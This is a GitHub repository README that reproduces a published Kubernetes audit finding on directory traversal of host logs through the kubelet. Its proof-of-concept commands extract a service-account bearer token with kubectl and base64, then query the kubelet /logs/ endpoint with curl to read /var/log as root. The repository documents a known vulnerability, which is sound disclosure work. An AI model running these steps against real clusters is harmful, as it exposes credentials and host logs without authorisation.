Skip to content
/ kubernetes-TOB-K8S-026 Public

Directory traversal of host logs running kube-apiserver and kubelet

3 stars 0 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

marcinguy/kubernetes-TOB-K8S-026

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

4 Commits
README.md
README.md
 
 

Repository files navigation

Source: https://github.com/kubernetes/community/blob/master/wg-security-audit/findings/Kubernetes%20Final%20Report.pdf

kubernetes-TOB-K8S-026

Directory traversal of host logs running kube-apiserver and kubelet

AWS_PROFILE=testing kubectl get secret
NAME                  TYPE                                  DATA      AGE
<token-name>  kubernetes.io/service-account-token   X         XXXd

AWS_PROFILE=testing kubectl get secret <token-name> -o json | jq -Mr '.data.token' | base64 -d

The output from previous command is the Bearer token. Put it under $MY_TOKEN below. Go to your K8s Node

curl -k -H "Authorization: Bearer $MY_TOKEN" "https://<node-ip>:10250/logs/"

And you should see /var/log with it subdirectories on the kubelet. You can enter directories and read with permission of root.

About

Directory traversal of host logs running kube-apiserver and kubelet

Resources

Readme
Activity

Stars

3 stars

Watchers

2 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published